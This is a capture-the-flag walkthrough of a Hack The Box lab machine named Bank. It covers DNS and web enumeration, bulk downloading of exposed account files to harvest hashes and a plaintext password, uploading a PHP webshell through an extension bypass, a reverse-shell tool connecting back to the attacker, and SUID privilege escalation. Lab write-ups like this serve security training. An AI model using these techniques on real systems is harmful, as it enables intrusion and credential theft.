
Not a ton to talk about for this box. It’s an interesting CTF style machine but I’m not sure I’d rank it in the OSCP prep category. Just something fun for a low key Sunday Morning 🙂
Defining The Attack Surface


We have 3 open ports and services running.
- 22 – SSH
- 53 – DNS
- 80 – Web Server (http)

Obligatory Nikto scan doesn’t reveal much
Let’s look at the browser

Something to note is that our earlier dig scan did identify the domain bank.htb
so I’m going to add that to my /etc/hosts
file and try the browser again

Something interesting to note

I always look at the source of at least the landing page on these things. Sometimes it pans out, sometimes not. This time, it looks like we may have found something useful. Sticking it in the back pocket for now
~~MORE ENUMERATION REQUIRED~~
I tried a series of password attacks from the dig output. I inferred that chris.bank.htb was actually an email Chris@Bank.htb
so I tried brute forcing it with hydara and rockyou.txt to no avail
More enumeration is needed

This wfuzz
scan got us everything we needed
Take note, uploads
| assets
| inc
| server-status
| balance-transfer
You’ll want to check each of these out.

/balance-transfer
is where the juicy stuff is

It looks like each of these files contains some type of encrypted user information
Let’s automate pulling this all down for further inspection
First I fetch the html of the page with curl
curl http://bank.htb/balance-transfers > transfers_raw
then I take that HTML over to http://regex101.com – If you don’t regex, you’re about to see how magical it is

I pasted all of the HTML into regex101 and then I wrote a really simple regex to grab all of the urls
(?>=acc\">).*(?=<\/a>)
What this regex says is
(?>=acc\">)
Start after acc">
.*
grab everything
(?=>\a>)
Stop at </a>
As you can see from the above screen shot, it successfully grabs all of the filenames.
Next I export it

I stuck that in a file called account_links
and now we’re ready to pull them all down
for link in $(cat account_links); do wget http://bank.htb/balance-transfer/$link ; done


that command pulled every file down.
Then to make sure I got it all, I cat’d each out with for file in $(ls); do cat $file ; done
Let’s see what we’ve got.
First I try and just pull the password hashes out
Same command as cating them out but with a grep in there
for file in $(ls); do cat $file | grep "Password
” ;done

Now let’s isolate the hash with cut
for file in $(ls); do cat $file | grep "Password" | cut -d " " -f2

And there’s all of our hashes!
As I was scrolling through them looking for anything that stood out, I came across this nugget

Looks like a plaintext password in there
The file size will probably be different so let’s see if we can find the file with ls
One more time with that bash for loop magic | quick and dirty is my middle name today
for file in $(ls); do echo $file ; cat $file | grep HTBB4nk ; done


Initial Access

Using our new found creds thanks to chris, we now have access to his account.
Not a ton to see here.
Flipping over to the support page we find a ticket system that allows for file uploads.

The first thing I try is uploading just a plain text file

Then I recalled that we found that little debug comment on the landing page about files with the extension htb


Sure enough, I tried renaming the same file with the htb extension and it uploaded.
The comment also said that the htb extension would execute as php. Seems pretty obvious this’d be our attack vector for a shell.
First I test it with a simple php script


Okay, now for the shell

No need to reinvent the wheel. Kali has a ton of webshells pre-baked

Don’t forget to change the IP and Port

Looks like the upload worked!
Let’s start our listener and open the shell

To easy – On to root
Getting Root
Something I have a habit of doing lately is dog fooding my favorite linux red team shell, shinobi shell
Once it’s downloaded to my attacking machine, I start up a shinobi server
./ShinobiShell.py -l 444

Next I pull it down to my victim machine

Starting the Shinobi Client is easy. We just give it the -c
flag for connect and it will prompt you for your attacking server IP. There’s other flags as well. ShinobiShell allows you to setup an encrypted tunnel if you wish.
./ShinobiShell.py -c
Because you’re prompted after run for the ip, port and encryption key, none of this will live in your logs and it makes it harder to discover


First stop is getting our user.txt flag if we can. Which it appears on this machine we can.
Now we move on to privilege escalation
This is where ShinobiShell really shines. It allows you to pull and push information/files/exploits to and from and through your attacking machine as you need with single commands.

Something I like to start with is suid3num
You can easily get it on your victim machine just by typing suid3num
ShinobiShell will go request over the tunnel to the ShinobiServer for suid3num and the ShinobiServer will go get the latest version and send it back over the tunnel to you


Once we run suid3num
we see there’s a binary called emergency
in /usr/htb/bin/
that has suid privileges
I decided to yolo and just run it to see what happened … Maybe we’ll get some help text on what it does

JK WE ROOT lol
And that’s the box